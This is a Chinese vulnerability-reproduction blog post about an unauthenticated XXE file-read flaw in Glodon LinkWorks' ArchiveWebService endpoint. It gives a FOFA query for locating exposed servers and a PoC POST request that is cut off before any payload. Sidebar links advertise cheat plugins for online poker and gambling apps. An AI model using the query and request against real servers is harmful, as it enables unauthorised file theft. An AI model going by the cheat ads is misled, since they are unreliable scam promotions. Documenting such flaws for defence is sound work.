广联达Linkworks ArchiveWebService XML实体注入漏洞复现
创始人
2025-01-07 20:36:42
0

0x01 产品简介

广联达 LinkWorks(也称为 GlinkLink 或 GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。

0x02 漏洞概述

广联达 LinkWorks /GB/LK/Document/ArchiveService/ArchiveWebService.asmx接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。

0x03 复现环境

FOFA:

body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

0x04 漏洞复现

PoC

POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1 Host:  Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: "http://GB/LK/Document/ArchiveService/ArchiveWebServi

上一篇:中英双语介绍一级市场(Primary Market)和二级市场(Secondary Market)

下一篇:去中心化技术的变革力量:探索Web3的潜力

相关内容

热门资讯

3分钟了解!粤友圈的挂插件开挂... 3分钟了解!粤友圈的挂插件开挂,山西扣点点辅助工具免费软件透视挂(最新版本2026)1、进入到山西扣...
黑科技辅助(德扑之星ai)外挂... 黑科技辅助(德扑之星ai)外挂软件透明挂智能ai代打辅助安装插件(透视)总结教程(2024已更新)(...
玩家必看攻略“扑克时间好假”(... 玩家必看攻略“扑克时间好假”(透视)详细开挂辅助技巧我们需要明确“透视”这一概念。在中,透视通常指的...
1分钟透视挂!新二号辅助软件下... 1分钟透视挂!新二号辅助软件下载,超级三加一正版(微信链接牛牛辅助开挂app)1、许多玩家不知道新二...
揭秘关于!wpk辅助软件,太坑... 揭秘关于!wpk辅助软件,太坑了先前存在有挂(2024已更新)(哔哩哔哩);1、这是跨平台的wpk辅...
1分钟了解!九游破解辅助插件官... 1分钟了解!九游破解辅助插件官网插件开挂,闲逸辅助软件软件透视挂(最新版本2026)1、完成九游破解...
黑科技辅助(WPK透视)外挂软... 黑科技辅助(WPK透视)外挂软件透明挂智能ai代打辅助挂(透视)德州教程(2023已更新)(哔哩哔哩...
记者揭秘“wepoker透视真... 记者揭秘“wepoker透视真的假的”(透视)详细开挂辅助技巧wepoker的用户界面设计简洁直观,...
六分钟透视挂!九游辅助插件,三... 六分钟透视挂!九游辅助插件,三加一辅助(微信链接牛牛辅助开挂软件)暗藏猫腻,小编详细说明九游辅助插件...
一分钟了解!wpk透视外挂会可... 一分钟了解!wpk透视外挂会可以样,太坑了原本是有挂(2023已更新)(哔哩哔哩);超受欢迎的wpk...